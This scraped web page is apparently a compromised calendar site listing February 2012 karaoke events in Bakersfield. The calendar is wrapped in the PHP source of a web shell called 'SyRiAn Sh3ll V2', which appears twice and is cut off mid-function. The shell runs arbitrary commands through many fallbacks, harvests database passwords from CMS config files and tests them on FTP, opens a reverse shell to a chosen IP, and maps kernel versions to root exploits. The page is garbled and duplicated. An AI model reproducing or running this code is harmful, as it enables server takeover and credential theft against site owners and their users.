";print"
$delmtxt
"; } function callfuncs($cmnd) { if (function_exists(shell_exec)) { $scmd=shell_exec($cmnd); $nscmd=htmlspecialchars($scmd); print $nscmd; } elseif(!function_exists(shell_exec)) { exec($cmnd,$ecmd); $ecmd = join("\n",$ecmd); $necmd=htmlspecialchars($ecmd); print $necmd; } elseif(!function_exists(exec)) { $pcmd = popen($cmnd,"r"); while (!feof($pcmd)) { $res = htmlspecialchars(fgetc($pcmd)); print $res; } pclose($pcmd); } elseif(!function_exists(popen)) { ob_start(); system($cmnd); $sret = ob_get_contents(); ob_clean(); print htmlspecialchars($sret); } elseif(!function_exists(system)) { ob_start(); passthru($cmnd); $pret = ob_get_contents(); ob_clean(); print htmlspecialchars($pret); } } function input($type,$name,$value,$size) { if (empty($value)) { print ""; } elseif(empty($name)&&empty($size)) { print ""; } elseif(empty($size)) { print ""; } else { print ""; } } function permcol($path) { if (is_writable($path)) { print ""; callperms($path); print ""; } elseif (!is_readable($path)&&!is_writable($path)) { print ""; callperms($path); print ""; } else { print "";callperms($path); } } function read_dir($path,$username) { if ($handle = opendir($path)) { while (false !== ($file = readdir($handle))) { $fpath="$path$file"; if (($file!='.') and ($file!='..')) { if (is_readable($fpath)) { $dr="$fpath/"; if (is_dir($dr)) { read_dir($dr,$username); } else { if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php')) { $pass=get_pass($fpath); if ($pass!='') { echo "[+] $fpath\n$pass\n"; ftp_check($username,$pass); } } } } } } } } function get_pass($link) { @$config=fopen($link,'r'); while(!feof($config)) { $line=fgets($config); if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) { if (strrpos($line,'"')) $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3))); else $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3))); return $pass; } } } function ftp_check($login,$pass) { @$ftp=ftp_connect('127.0.0.1'); if ($ftp) { @$res=ftp_login($ftp,$login,$pass); if ($res) { echo '[FTP] '.$login.':'.$pass." Success\n"; } else ftp_quit($ftp); } } function GetRealIP() { if (getenv(HTTP_X_FORWARDED_FOR)) { $ip=getenv(HTTP_X_FORWARDED_FOR); } elseif (getenv(HTTP_CLIENT_IP)) { $ip=getenv(HTTP_CLIENT_IP); } else { $ip=getenv(REMOTE_ADDR); } return $ip; } function openBaseDir() { $openBaseDir = ini_get("open_basedir"); if (!$openBaseDir) { $openBaseDir = '0ff'; } else { $openBaseDir = '0N'; } return $openBaseDir; } function str_hex($string) { $hex=''; for ($i=0; $i < strlen($string); $i++) { $hex .= dechex(ord($string[$i])); } return $hex; } function SafeMode() { $safe_mode = ini_get("safe_mode"); if (!$safe_mode) { $safe_mode = '0ff'; } else { $safe_mode = '0N'; } return $safe_mode; } function currentFileName() { $currentFileName = $_SERVER["SCRIPT_NAME"]; $currentFileName = Explode('/', $currentFileName); $currentFileName = $currentFileName[count($currentFileName) - 1]; return $currentFileName; } function Suicide() { unlink(currentFileName()); } function rootxpL() { $v=@php_uname(); $db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace'); foreach($db as $k=>$x)if(strstr($v,$k))return $x; if(!$xpl)$xpl='Not found.'; return $xpl; } function PostgreSQL() { if(@function_exists('pg_connect')) { $postgreSQL = "On"; } else { $postgreSQL = "Off"; } return $postgreSQL; } function Oracle() { if(@function_exists('ocilogon')) { $oracle = "On"; } else { $oracle = "Off"; } return $oracle; } function MsSQL() { if(@function_exists('mssql_connect')) { $msSQL = "On"; } else { $msSQL = "Off"; } return $msSQL; } function MySQL2() { $mysql_try = function_exists('mysql_connect'); if($mysql_try) { $mysql = "0N"; } else { $mysql = "0ff"; } return $mysql; } function Gzip() { if (function_exists('gzencode')) { $gzip = "ON"; } else { $gzip = "Off"; } return $gzip; } function MysqlI() { if (function_exists('mysqli_connect')) { $mysqli = "ON"; } else { $mysqli = "Off"; } return $mysqli; } function MSQL() { if (function_exists('msql_connect')) { $mSql = " ON "; } else { $mSql = "Off"; } return $mSql; } function SQlLite() { if (function_exists('sqlite_open')) { $SQlLite = "ON"; } else { $SQlLite = "Off"; } return $SQlLite; } function RegisterGlobals() { if(ini_get('register_globals')) { $registerg="On"; } else { $registerg="Off"; } return $registerg; } function HardSize($size) { if($size >= 1073741824) { $size = @round($size / 1073741824 * 100) / 100 . " GB"; } elseif($size >= 1048576) { $size = @round($size / 1048576 * 100) / 100 . " MB"; } elseif($size >= 1024) { $size = @round($size / 1024 * 100) / 100 . " KB"; } else { $size = $size . " B"; } return $size; } function Curl() { if(extension_loaded('curl')) { $curl = "On"; } else { $curl = "Off"; } return $curl; } function DecryptConfig() { @include("DecryptConfig.php"); if($_POST['ScriptType'] == 'vb') { $dbName = $config['Database']['dbname']; $prefix = $config['Database']['tableprefix']; $email = $config['Database']['technicalemail']; $host = $config['MasterServer']['servername']; $port = $config['MasterServer']['port']; $user = $config['MasterServer']['username']; $pass = $config['MasterServer']['password']; $admincp = $config['Misc']['admincpdir']; $modecp = $config['Misc']['modcpdir']; } elseif($_POST['ScriptType'] == 'wp') { $dbName = DB_NAME; $prefix = $table_prefix; $host = DB_HOST; $user = DB_USER; $pass = DB_PASS; } elseif($_POST['ScriptType'] == 'jos') { $dbName = $db; $prefix = $dbprefix; $email = $mailfrom; $host = $host; $user = $user; $pass = $password; } elseif($_POST['ScriptType'] == 'phpbb') { $host = $dbhost; $port = $dbport; $dbName = $dbname; $user = $dbuser; $pass = $dbpasswd; $prefix = $table_prefix; } elseif($_POST['ScriptType'] == 'ipb') { $host = $INFO['sql_host']; $dbName = $INFO['sql_database']; $user = $INFO['sql_user']; $pass = $INFO['sql_pass']; $prefix = $INFO['sql_tbl_prefix']; } elseif($_POST['ScriptType'] == 'smf') { $dbName = $db_name; $pass = $db_passwd; $prefix = $db_prefix; $host = $db_server; $user = $db_user; $email = $webmaster_email; } elseif($_POST['ScriptType'] == 'mybb') { $host = $config['database']['hostname']; $user = $config['database']['username']; $pass = $config['database']['password']; $dbName = $config['database']['database']; $prefix = $config['database']['table_prefix']; $admincp = $config['admin_dir']; $prefix = $config['database']['table_prefix']; } echo ' #-------------------------------# # Config Informations # #-------------------------------# Host : '.$host.' DB Name : '.$dbName.' DB User : '.$user.' DB Pass : '.$pass.' Prefix : '.$prefix.' Email : '.$email.' Port : '.$port.' ACP : '.$admincp.' MCP : '.$modecp.' '; } function footer() { echo '
[TOP]
C0D3D By  ~~ [ EH SyRiAn_34G13 ] ~~ [ sy34@msn.com ] ~~ [ www.syrian-shell.com ]
'; } function whereistmP() { $uploadtmp=ini_get('upload_tmp_dir'); $uf=getenv('USERPROFILE'); $af=getenv('ALLUSERSPROFILE'); $se=ini_get('session.save_path'); $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp'; if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp'; if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; if(is_dir($uf) && is_writable($uf))return $uf; if(is_dir($af) && is_writable($af))return $af; if(is_dir($se) && is_writable($se))return $se; if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp; if(is_dir($envtmp) && is_writable($envtmp))return $envtmp; return '.'; } function winshelL($command) { $name=whereistmP()."\\".uniqid('NJ'); win_shell_execute('cmd.exe','',"/C $command >\"$name\""); sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function update() { echo "[+] Update Has D0n3 ^_^"; } function srvshelL($command) { $name=whereistmP()."\\".uniqid('NJ'); $n=uniqid('NJ'); $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec']; win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\"")); win32_start_service($n); win32_stop_service($n); win32_delete_service($n); while(!file_exists($name))sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function ffishelL($command) { $name=whereistmP()."\\".uniqid('NJ'); $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0); while(!file_exists($name))sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function comshelL($command,$ws) { $exec=$ws->exec("cmd.exe /c $command"); $so=$exec->StdOut(); return $so->ReadAll(); } function perlshelL($command) { $perl=new perl(); ob_start(); $perl->eval("system(\"$command\")"); $exec=ob_get_contents(); ob_end_clean(); return $exec; } function Exe($command) { global $windows; $exec=$output=''; $dep[]=array('pipe','r');$dep[]=array('pipe','w'); if(function_exists('passthru')){ob_start();@passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();} elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;} elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;} elseif(function_exists('shell_exec'))$exec=@shell_exec($command); elseif(function_exists('popen')){$output=@popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);} elseif(function_exists('proc_open')){$res=@proc_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);} elseif(function_exists('win_shell_execute'))$exec=winshelL($command); elseif(function_exists('win32_create_service'))$exec=srvshelL($command); elseif(extension_loaded('ffi') && $windows)$exec=ffishelL($command); elseif(extension_loaded('perl'))$exec=perlshelL($command); return $exec; } function magicQouts() { $mag=get_magic_quotes_gpc(); if (empty($mag)) { $mag = "0ff"; } else { $mag="0N"; } return $mag; } function DisableFunctions() { $disfun = ini_get('disable_functions'); if (empty($disfun)) { $disfun = "NONE"; } return $disfun; } $uname= @php_uname(); function SelectCommand($os) { if($os == 'Windows') { echo " "; } else { echo " "; } } function GenerateFile($name,$content) { $file = @fopen($name,"w+"); @fwrite($file,$content); @fclose($file); return true; } function Logout() { print""; } if($_GET['id']== 'logout') { Logout(); } # ---------------------------------------# # CSS # #----------------------------------------# echo " SyRiAn Sh3ll ~ V2~ [ B3 Cr34T!V3 Or D!3 TRy!nG ] "; if($_GET['id'] == '') { echo ""; } # ---------------------------------------# # Authentication # #----------------------------------------# if ($uselogin ==1) { if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass)) { if($_POST[usrname]==$user and $_POST[passwrd]==$pass) { print''; } else { if($_POST[usrname]) { print''; } echo '

SyRiAn Sh3ll
UserName :

Password :

'; exit; } } } # ---------------------------------------# # Operating System # #----------------------------------------# $os = null; $dir = getcwd(); if(strlen($dir)>1 && $dir[1]==":") $os = "Windows"; else $os = "Linux"; # ---------------------------------------# # Server Dir # #----------------------------------------# if(empty($dir)) { $opsy = getenv('OS'); if(empty($opsy)) { $opsy = php_uname(); } if(empty($opsy)) { $opsy ="-"; $os = "Linux"; } else { if(eregi("^Windows",$opsy)) { $os = "Windows"; } else { $os = "Linux"; } } } if($os == "Linux") { $pwd = @Exe("pwd"); } elseif($os == "Windows") { $pwd = @Exe("cd");} if(empty($pwd)) { $pwd = getcwd(); } # ---------------------------------------# # Header # #----------------------------------------# $serverIP = gethostbyname($_SERVER["HTTP_HOST"]); $server = @substr($SERVER_SOFTWARE,0,120); echo "

  

 
SyRiAn Sh3ll
V2

  [Main] [Scripts Hacking] [Spamming] [Bypass] [About] [Logout] [SuiCide]

  Safe Mode = ".@SafeMode()."   System = ".$os."   Magic_Quotes = ". @magicQouts()."   Curl = ".@Curl()."   Register Globals = ".@RegisterGlobals()."   Open Basedir = ".@openBaseDir()."
  Gzip = ".@Gzip()."   MySQLI = ".@MysqlI()."   MSQL = ".@MSQL()."   SQL Lite = ".@SQlLite()."   Usefull Locals = ".rootxpL()."
  Free Space = ".@HardSize(disk_free_space('/'))."   Total Space = ".@HardSize(disk_total_space("/"))."   PHP Version = ".@phpversion()."   Zend Version = ".@zend_version()."   MySQL Version = ".@mysql_get_server_info()."
  MySQL = ".MySQL2()."   MsSQL = ".MsSQL()."   PostgreSQL = ".PostgreSQL()."   Oracle = ".Oracle()."   Server Name = ".$_SERVER['HTTP_HOST']."   Server Admin = ".$_SERVER['SERVER_ADMIN']."
  Dis_Functions = ". DisableFunctions()."
  Your IP = ". GetRealIP()."   Server IP = ".gethostbyname($_SERVER["HTTP_HOST"])." [Bing Search] [Reverse IP]   Date Time = ".date('Y-m-d H:i:s')."

  Server :  
uname -a :  
pwd :  
ID :  

  ".$server."
  ".$uname." [Google]
  ".$dir."
  ".Exe('id')."

  [Down] [Print]

"; # ---------------------------------------# # SuiCide # #----------------------------------------# if($_GET['id'] == 100) { echo ""; } if($_GET['id'] == 'Delete') { Suicide(); } # ---------------------------------------# # Main Page # #----------------------------------------# if ($_GET['id']== 'mainPage' ) { echo "
"; if($_POST['editFileSubmit']) { echo " "; echo ""; } echo "
  Commands Alias
";SelectCommand($os); echo "
  Command Line
  Change Directory
  Edit File
  Get File
  Server ShortCut
  CGI Perl
  Change Mode

  Back Connection

"; if($_POST['backConnectionSubmit']) { $ip = $_POST['yourip']; $port = $_POST['yourport']; @set_time_limit (0); $VERSION = "1.0"; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; if (function_exists('pcntl_fork')) { $pid = pcntl_fork(); if ($pid == -1) { printit("[-] ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { printit("[-] Error: Can't setsid()"); exit(1); } $daemon = 1; } else { printit("[-] WARNING: Failed to daemonise. This is quite common and not fatal."); } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("[-] Error Can't Connect !! "); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("[+] Connected Successfully With $ip:$port"); printit("[+] SyRiAn Sh3ll V2"); while (1) { if (feof($sock)) { printit("[-] ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("[-] ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print "$string\n"; } } } echo "
  Hash Analyzer
  Eval Code
  Users & Domains
  Reading Files
  Encryption
  Metasploit Connection
  Show Users
  Ports Scanner
  ACP Finder
  DDOS Attacker
  Config Finder
February 2012March 2012March 2012
Thursday, February 02, 2012
Karaoke King Show

The Karaoke King Show is open to all ages.
Come out and sing tonight or watch our show live online ...

Contact Info : Tomi's Cowgirl Cafe 1440 Weedpatch Hwy Bakersfield, Ca 93307 661-633-1949 Url: http://www.karaokekingshow.com
Friday, February 03, 2012
Karaoke King Show

The Karaoke King Show is a Live event open to all ages.
Come on out and Sing and have dinner.

To...

Contact Info : Tomi's Cowgirl Cafe 1440 Weedpatch Hwy Bakersfield, Ca 93307 Url: http://www.karaokekingshow.com
Tuesday, February 07, 2012
Karaoke King Show

The karaoke King Show will be Live at Replay Lounge
4500 Buck Owens Blvd

Url: http://www.karaokekingshow.com
Thursday, February 09, 2012
Karaoke King Show

The Karaoke King Show is open to all ages.
Come out and sing tonight or watch our show live online ...

Contact Info : Tomi's Cowgirl Cafe 1440 Weedpatch Hwy Bakersfield, Ca 93307 661-633-1949 Url: http://www.karaokekingshow.com
Friday, February 10, 2012
Karaoke King Show

The Karaoke King Show is a Live event open to all ages.
Come on out and Sing and have dinner.

To...

Contact Info : Tomi's Cowgirl Cafe 1440 Weedpatch Hwy Bakersfield, Ca 93307 Url: http://www.karaokekingshow.com
Tuesday, February 14, 2012
Karaoke King Show

The karaoke King Show will be Live at Replay Lounge
4500 Buck Owens Blvd

Url: http://www.karaokekingshow.com
Thursday, February 16, 2012
Karaoke King Show

The Karaoke King Show is open to all ages.
Come out and sing tonight or watch our show live online ...

Contact Info : Tomi's Cowgirl Cafe 1440 Weedpatch Hwy Bakersfield, Ca 93307 661-633-1949 Url: http://www.karaokekingshow.com
Friday, February 17, 2012
Karaoke King Show

The Karaoke King Show is a Live event open to all ages.
Come on out and Sing and have dinner.

To...

Contact Info : Tomi's Cowgirl Cafe 1440 Weedpatch Hwy Bakersfield, Ca 93307 Url: http://www.karaokekingshow.com
Tuesday, February 21, 2012
Karaoke King Show

The karaoke King Show will be Live at Replay Lounge
4500 Buck Owens Blvd

Url: http://www.karaokekingshow.com
Thursday, February 23, 2012
Karaoke King Show

The Karaoke King Show is open to all ages.
Come out and sing tonight or watch our show live online ...

Contact Info : Tomi's Cowgirl Cafe 1440 Weedpatch Hwy Bakersfield, Ca 93307 661-633-1949 Url: http://www.karaokekingshow.com
Friday, February 24, 2012
Karaoke King Show

The Karaoke King Show is a Live event open to all ages.
Come on out and Sing and have dinner.

To...

Contact Info : Tomi's Cowgirl Cafe 1440 Weedpatch Hwy Bakersfield, Ca 93307 Url: http://www.karaokekingshow.com
Tuesday, February 28, 2012
Karaoke King Show

The karaoke King Show will be Live at Replay Lounge
4500 Buck Owens Blvd

Url: http://www.karaokekingshow.com
General   Bridal Shows   Concerts   Charity Events  
Karaoke   Plays      

Search Calendar

Powered by ExtCalendar 2

";print"
$delmtxt
"; } function callfuncs($cmnd) { if (function_exists(shell_exec)) { $scmd=shell_exec($cmnd); $nscmd=htmlspecialchars($scmd); print $nscmd; } elseif(!function_exists(shell_exec)) { exec($cmnd,$ecmd); $ecmd = join("\n",$ecmd); $necmd=htmlspecialchars($ecmd); print $necmd; } elseif(!function_exists(exec)) { $pcmd = popen($cmnd,"r"); while (!feof($pcmd)) { $res = htmlspecialchars(fgetc($pcmd)); print $res; } pclose($pcmd); } elseif(!function_exists(popen)) { ob_start(); system($cmnd); $sret = ob_get_contents(); ob_clean(); print htmlspecialchars($sret); } elseif(!function_exists(system)) { ob_start(); passthru($cmnd); $pret = ob_get_contents(); ob_clean(); print htmlspecialchars($pret); } } function input($type,$name,$value,$size) { if (empty($value)) { print ""; } elseif(empty($name)&&empty($size)) { print ""; } elseif(empty($size)) { print ""; } else { print ""; } } function permcol($path) { if (is_writable($path)) { print ""; callperms($path); print ""; } elseif (!is_readable($path)&&!is_writable($path)) { print ""; callperms($path); print ""; } else { print "";callperms($path); } } function read_dir($path,$username) { if ($handle = opendir($path)) { while (false !== ($file = readdir($handle))) { $fpath="$path$file"; if (($file!='.') and ($file!='..')) { if (is_readable($fpath)) { $dr="$fpath/"; if (is_dir($dr)) { read_dir($dr,$username); } else { if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php')) { $pass=get_pass($fpath); if ($pass!='') { echo "[+] $fpath\n$pass\n"; ftp_check($username,$pass); } } } } } } } } function get_pass($link) { @$config=fopen($link,'r'); while(!feof($config)) { $line=fgets($config); if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) { if (strrpos($line,'"')) $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3))); else $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3))); return $pass; } } } function ftp_check($login,$pass) { @$ftp=ftp_connect('127.0.0.1'); if ($ftp) { @$res=ftp_login($ftp,$login,$pass); if ($res) { echo '[FTP] '.$login.':'.$pass." Success\n"; } else ftp_quit($ftp); } } function GetRealIP() { if (getenv(HTTP_X_FORWARDED_FOR)) { $ip=getenv(HTTP_X_FORWARDED_FOR); } elseif (getenv(HTTP_CLIENT_IP)) { $ip=getenv(HTTP_CLIENT_IP); } else { $ip=getenv(REMOTE_ADDR); } return $ip; } function openBaseDir() { $openBaseDir = ini_get("open_basedir"); if (!$openBaseDir) { $openBaseDir = '0ff'; } else { $openBaseDir = '0N'; } return $openBaseDir; } function str_hex($string) { $hex=''; for ($i=0; $i < strlen($string); $i++) { $hex .= dechex(ord($string[$i])); } return $hex; } function SafeMode() { $safe_mode = ini_get("safe_mode"); if (!$safe_mode) { $safe_mode = '0ff'; } else { $safe_mode = '0N'; } return $safe_mode; } function currentFileName() { $currentFileName = $_SERVER["SCRIPT_NAME"]; $currentFileName = Explode('/', $currentFileName); $currentFileName = $currentFileName[count($currentFileName) - 1]; return $currentFileName; } function Suicide() { unlink(currentFileName()); } function rootxpL() { $v=@php_uname(); $db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace'); foreach($db as $k=>$x)if(strstr($v,$k))return $x; if(!$xpl)$xpl='Not found.'; return $xpl; } function PostgreSQL() { if(@function_exists('pg_connect')) { $postgreSQL = "On"; } else { $postgreSQL = "Off"; } return $postgreSQL; } function Oracle() { if(@function_exists('ocilogon')) { $oracle = "On"; } else { $oracle = "Off"; } return $oracle; } function MsSQL() { if(@function_exists('mssql_connect')) { $msSQL = "On"; } else { $msSQL = "Off"; } return $msSQL; } function MySQL2() { $mysql_try = function_exists('mysql_connect'); if($mysql_try) { $mysql = "0N"; } else { $mysql = "0ff"; } return $mysql; } function Gzip() { if (function_exists('gzencode')) { $gzip = "ON"; } else { $gzip = "Off"; } return $gzip; } function MysqlI() { if (function_exists('mysqli_connect')) { $mysqli = "ON"; } else { $mysqli = "Off"; } return $mysqli; } function MSQL() { if (function_exists('msql_connect')) { $mSql = " ON "; } else { $mSql = "Off"; } return $mSql; } function SQlLite() { if (function_exists('sqlite_open')) { $SQlLite = "ON"; } else { $SQlLite = "Off"; } return $SQlLite; } function RegisterGlobals() { if(ini_get('register_globals')) { $registerg="On"; } else { $registerg="Off"; } return $registerg; } function HardSize($size) { if($size >= 1073741824) { $size = @round($size / 1073741824 * 100) / 100 . " GB"; } elseif($size >= 1048576) { $size = @round($size / 1048576 * 100) / 100 . " MB"; } elseif($size >= 1024) { $size = @round($size / 1024 * 100) / 100 . " KB"; } else { $size = $size . " B"; } return $size; } function Curl() { if(extension_loaded('curl')) { $curl = "On"; } else { $curl = "Off"; } return $curl; } function DecryptConfig() { @include("DecryptConfig.php"); if($_POST['ScriptType'] == 'vb') { $dbName = $config['Database']['dbname']; $prefix = $config['Database']['tableprefix']; $email = $config['Database']['technicalemail']; $host = $config['MasterServer']['servername']; $port = $config['MasterServer']['port']; $user = $config['MasterServer']['username']; $pass = $config['MasterServer']['password']; $admincp = $config['Misc']['admincpdir']; $modecp = $config['Misc']['modcpdir']; } elseif($_POST['ScriptType'] == 'wp') { $dbName = DB_NAME; $prefix = $table_prefix; $host = DB_HOST; $user = DB_USER; $pass = DB_PASS; } elseif($_POST['ScriptType'] == 'jos') { $dbName = $db; $prefix = $dbprefix; $email = $mailfrom; $host = $host; $user = $user; $pass = $password; } elseif($_POST['ScriptType'] == 'phpbb') { $host = $dbhost; $port = $dbport; $dbName = $dbname; $user = $dbuser; $pass = $dbpasswd; $prefix = $table_prefix; } elseif($_POST['ScriptType'] == 'ipb') { $host = $INFO['sql_host']; $dbName = $INFO['sql_database']; $user = $INFO['sql_user']; $pass = $INFO['sql_pass']; $prefix = $INFO['sql_tbl_prefix']; } elseif($_POST['ScriptType'] == 'smf') { $dbName = $db_name; $pass = $db_passwd; $prefix = $db_prefix; $host = $db_server; $user = $db_user; $email = $webmaster_email; } elseif($_POST['ScriptType'] == 'mybb') { $host = $config['database']['hostname']; $user = $config['database']['username']; $pass = $config['database']['password']; $dbName = $config['database']['database']; $prefix = $config['database']['table_prefix']; $admincp = $config['admin_dir']; $prefix = $config['database']['table_prefix']; } echo ' #-------------------------------# # Config Informations # #-------------------------------# Host : '.$host.' DB Name : '.$dbName.' DB User : '.$user.' DB Pass : '.$pass.' Prefix : '.$prefix.' Email : '.$email.' Port : '.$port.' ACP : '.$admincp.' MCP : '.$modecp.' '; } function footer() { echo '
[TOP]
C0D3D By  ~~ [ EH SyRiAn_34G13 ] ~~ [ sy34@msn.com ] ~~ [ www.syrian-shell.com ]
'; } function whereistmP() { $uploadtmp=ini_get('upload_tmp_dir'); $uf=getenv('USERPROFILE'); $af=getenv('ALLUSERSPROFILE'); $se=ini_get('session.save_path'); $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp'; if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp'; if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; if(is_dir($uf) && is_writable($uf))return $uf; if(is_dir($af) && is_writable($af))return $af; if(is_dir($se) && is_writable($se))return $se; if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp; if(is_dir($envtmp) && is_writable($envtmp))return $envtmp; return '.'; } function winshelL($command) { $name=whereistmP()."\\".uniqid('NJ'); win_shell_execute('cmd.exe','',"/C $command >\"$name\""); sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function update() { echo "[+] Update Has D0n3 ^_^"; } function srvshelL($command) { $name=whereistmP()."\\".uniqid('NJ'); $n=uniqid('NJ'); $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec']; win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\"")); win32_start_service($n); win32_stop_service($n); 